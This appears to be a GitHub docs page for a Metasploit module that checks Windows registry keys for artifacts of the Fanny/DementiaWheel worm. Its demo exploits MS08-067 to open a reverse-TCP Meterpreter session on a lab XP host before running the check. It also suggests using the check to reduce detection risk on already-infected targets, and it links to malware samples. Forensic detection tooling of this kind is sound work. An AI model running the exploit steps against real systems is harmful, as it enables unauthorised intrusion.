-
Notifications
You must be signed in to change notification settings - Fork 12
Docs
Fanny or DWE for short. (DWE = DementiaWheel)
Detection module based on the post-/gather/forensics module duqu_check.rb, Fanny is a worm that infects windows machines, via USB (not trough Autorun, or at least not only).
in fact, It used exploits later found in StuxNet. It creates creates some Registry artifacts.
This module is intended to detect those artifacts.
- [x] Windows x86
- [x] Meterpreter
- [x] Shell
- [x] Windows XP Pro (SP3)
-
First, Git clone the fanny_bmp_check.rb from https://github.com/loneicewolf/metasploit_fanny_check_module/blob/main/fanny_bmp_check.rb
-
place it into your msf folder, (important, check the following step before placing it) usually located in /root/.msf4/modules/
-
* make the following folders: (under each other) /post/windows/gather/forensics/ <fanny_bmp_check.rb here>
-
Start msfconsole
-
use exploit/windows/smb/ms08_067_netapi
-
set RHOST and LHOST.
-
msf6 exploit(windows/smb/ms08_067_netapi) > run
[] Started reverse TCP handler on 192.168.122.1:4444 [] 192.168.122.160:445 - Automatically detecting the target... [] 192.168.122.160:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English [] 192.168.122.160:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX) [] 192.168.122.160:445 - Attempting to trigger the vulnerability... [] Sending stage (175174 bytes) to 192.168.122.160 [*] Meterpreter session 4 opened (192.168.122.1:4444 -> 192.168.122.160:1043) at 2020-12-22 16:55:02 +0100
meterpreter > run post/windows/gather/forensics/fanny_bmp_check
[*] Searching registry on WORKSTATION1 for Fanny.bmp artifacts.
[+] WORKSTATION1: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4\Driver found in registry.
[+] WORKSTATION1: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4\filter2 found in registry.
[+] WORKSTATION1: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4\filter3 found in registry.
[+] WORKSTATION1: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4\filter8 found in registry.
[*] WORKSTATION1: 4 result(s) found in registry.
List each option and how to use it. Session is needed, Do not know really what to include here, other than that.
< Intentionally left blank >
Talk about what it does, and how to use it appropriately. If the default value is likely to change, include the default value here.
< Intentionally left blank >
Specific #demo
1 thing this could be used as, is (as with the duqu_check) to check, if a target system (that you/your team is going to/will/plan to perform one or more penetration tests on, already is infected by any of those, and it would probably make a nice looking "alert" to malware researchers who runs malwares into sandboxes and vms; (Because it would shortly make the system/vm more "targeted" if infected even more.
For example and if a VM(for example) is infected with Duqu, Maybe it's not the most optimal 'thing' to infect it with anything (else - in general, at all) By e.g Using metasploit, (because, the system already is infected with Duqu(if we take a Duqu Infected VM/System as an example), Duqu - wich is kinda well known by now, will make the VM (or if it is a real os, which still does happen) more suspected for malware.
So, short story: the less malicious activity (the less "malware") on a system, the less detection risk is present.
I Will upload a POC video demonstrating this on Windows 10, x64. Sooner or later. There's already a XP POC video located here
"Equation Group Q&A PDF File" - Explaining (not only) Fanny, (but also many others, in the "same family" of malware)
If needed, I included malware samples on the same page.
It goes without saying that if you proceed to this page Please exercise caution.
- https://securelist.com/a-fanny-equation-i-am-your-father-stuxnet/68787
- https://fmnagisa.wordpress.com/2020/08/27/revisiting-equationgroups-fanny-worm-or-dementiawheel/
- https://edwardsnowden.com/wp-content/uploads/2017/06/FOXACID-Server-SOP-Redacted.pdf
- Windows XP Pro SP3 English
Any questions or Improvements / Issues is welcomed either via mail or at the issues tab/page. william-martens@protonmail.ch
< Footer coming soon >
<Sidebar coming soon>